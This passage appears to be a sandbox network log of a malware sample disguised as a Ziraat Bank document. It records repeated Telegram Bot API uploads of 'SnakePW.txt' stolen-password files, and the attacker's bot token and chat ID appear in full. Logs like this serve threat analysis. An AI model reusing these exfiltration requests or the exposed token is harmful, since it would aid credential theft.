                                      2024-09-26 08:59:47 UTC516INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 38 36 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35834,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341186,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.449767149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:47 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdfa6ea576c3e
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 08:59:47 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 61 36 65 61 35 37 36 63 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdfa6ea576c3eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:51 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:50 GMT
                                      Content-Type: application/json
                                      Content-Length: 516
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:51 UTC516INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 39 30 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35835,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341190,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.449768149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:51 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdfddd1313012
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:51 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 64 64 64 31 33 31 33 30 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdfddd1313012Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:51 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:51 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:51 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 39 31 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35836,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341191,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.449769149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:52 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdfed6fd2f49d
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 08:59:52 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 65 64 36 66 64 32 66 34 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdfed6fd2f49dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:52 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:52 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:52 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 39 32 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35837,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341192,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.449770149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:53 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcdffbba69b270
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:53 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 66 62 62 61 36 39 62 32 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcdffbba69b270Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:53 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:53 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:53 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 39 33 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35838,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341193,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.449771149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:54 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce00b4b084ba2
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 08:59:54 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 30 62 34 62 30 38 34 62 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce00b4b084ba2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:54 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:54 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:54 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 39 34 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35839,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341194,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.449772149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:55 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce0198a4b1319
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:55 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 31 39 38 61 34 62 31 33 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce0198a4b1319Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:58 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:58 GMT
                                      Content-Type: application/json
                                      Content-Length: 516
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:58 UTC516INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 31 39 38 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35840,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341198,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.449774149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:59 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce060711de9d1
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 08:59:59 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 36 30 37 31 31 64 65 39 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce060711de9d1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 08:59:59 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 08:59:59 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 25
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 08:59:59 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 35 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 25","parameters":{"retry_after":25}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
